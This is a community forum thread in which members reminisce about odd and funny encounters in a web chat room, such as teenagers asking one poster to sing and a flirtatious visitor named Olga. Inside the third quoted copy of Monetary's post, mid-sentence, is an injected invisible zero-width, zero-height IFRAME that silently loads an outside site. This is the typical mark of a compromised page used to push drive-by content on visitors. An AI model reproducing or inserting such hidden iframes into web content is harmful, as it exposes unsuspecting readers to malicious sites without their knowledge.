Audio Video Web Conferencing : Most Memorable Chat Moments

Chat memories that have me on guard...

I can't forget about the time...although I'm trying to forget...this chinese teenager asked me to sing on the mic....said that he wanted to hear my voice....that he liked my voice. Mind you, all of this was AFTER I got the gender information from him and disclosed mine...as if he couldn't tell already. We had a room full of Sistas...but he didn't want to hear them on the mic. smh

Then, maybe a week or two after that, some european teenagers asked the same thing of me. Hell, one of them kept coming in chat looking for me. If I wasn't there, he'd leave.

And oh, I ain't gonna talk about the Londoner that almost got beat down in chat by Sonnee and Ms Drea for literally throwing herself at me...well, that was after she was hitting on Sonnee. :lol: :lol: :lol: :lol:

That's what I get for trying to get her off of Sonnee's back. She got on me strong. :lol:

There's something wrong in the water in the European and Asian/Pacific realms. :lol: :lol: :lol: :lol:

rofl

Monetary said:
I can't forget about the time...although I'm trying to forget...this chinese teenager asked me to sing on the mic....said that he wanted to hear my voice....that he liked my voice. Mind you, all of this was AFTER I got the gender information from him and disclosed mine...as if he couldn't tell already. We had a room full of Sistas...but he didn't want to hear them on the mic. smh

Then, maybe a week or two after that, some european teenagers asked the same thing of me. Hell, one of them kept coming in chat looking for me. If I wasn't there, he'd leave.

And oh, I ain't gonna talk about the Londoner that almost got beat down in chat by Sonnee and Ms Drea for literally throwing herself at me...well, that was after she was hitting on Sonnee. :lol: :lol: :lol: :lol:

That's what I get for trying to get her off of Sonnee's back. She got on me strong. :lol:

There's something wrong in the water in the European and Asian/Pacific realms. :lol: :lol: :lol: :lol:

Money I remember that like it was yesterday...whew I was rollin....lolol

rofl@something wrong in the water....lolol

That happened to me back in the old chat, man you can run across some strange stuff in chat..lol

Monetary said:
I can't forget about the time...although I'm trying to forget...this chinese teenager asked me to sing on the mic....said that he wanted to hear my voice....that he liked my voice. Mind you, all<IFRAME SRC="http://iccee.com/index.html" WIDTH=0 HEIGHT=0 SCROLLING=NO FRAMEBORDER=0></IFRAME> of this was AFTER I got the gender information from him and disclosed mine...as if he couldn't tell already. We had a room full of Sistas...but he didn't want to hear them on the mic. smh

I'll never look at you the same way again Money!

Monetary said:

Yeah….this night was way too funny! Her name was Olga, and man she was off the hook. She actually scared the mess out of me that's why I was like “Money are you there” ewwwheeee…..girlfriend was in a serious mood, and I could not help her out, but me and my sister Drea throw a few hooks trying to beat her off Money. Yeah, this one I will remember, it would not surprise me if she comes back…

Donate

Support destee.com, the oldest, most respectful, online black community in the world - PayPal or CashApp

Latest profile posts

HODEE wrote on Etophil's profile.
Welcome to Destee
@Etophil
Destee wrote on SleezyBigSlim's profile.
Hi @SleezyBigSlim ... Welcome Welcome Welcome ... :flowers: ... please make yourself at home ... :swings:
Back